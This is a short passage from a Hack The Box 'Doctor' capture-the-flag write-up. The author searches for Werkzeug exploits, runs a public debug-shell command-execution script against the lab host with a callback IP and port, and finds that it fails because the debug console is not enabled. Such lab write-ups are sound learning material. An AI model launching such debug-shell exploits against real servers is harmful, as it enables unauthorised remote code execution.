Skip to content

Latest commit

 

History

History
24 lines (19 loc) · 1.29 KB

Failed-Werkzeug-exploit.md

File metadata and controls

24 lines (19 loc) · 1.29 KB
Raw

Failed Werkzeug exploit

Unsure of what to do, I went back to http://doctors.htb and searchsploit the unusual Web server header.

root@Kali:~/HTB/Doctor# searchsploit Werkzeug
----------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                             |  Path
----------------------------------------------------------------------------------------------------------- ---------------------------------
Werkzeug - 'Debug Shell' Command Execution                                                                 | multiple/remote/43905.py
Werkzeug - Debug Shell Command Execution (Metasploit)                                                      | python/remote/37814.rb
----------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

I tried the Python one

root@Kali:~/HTB/Doctor# ./43905.py doctors.htb 80 10.10.14.78 443
[-] Debug is not enabled

Unsure what this meant, I read the MSF exploit and found that it required Web dir /console to be present.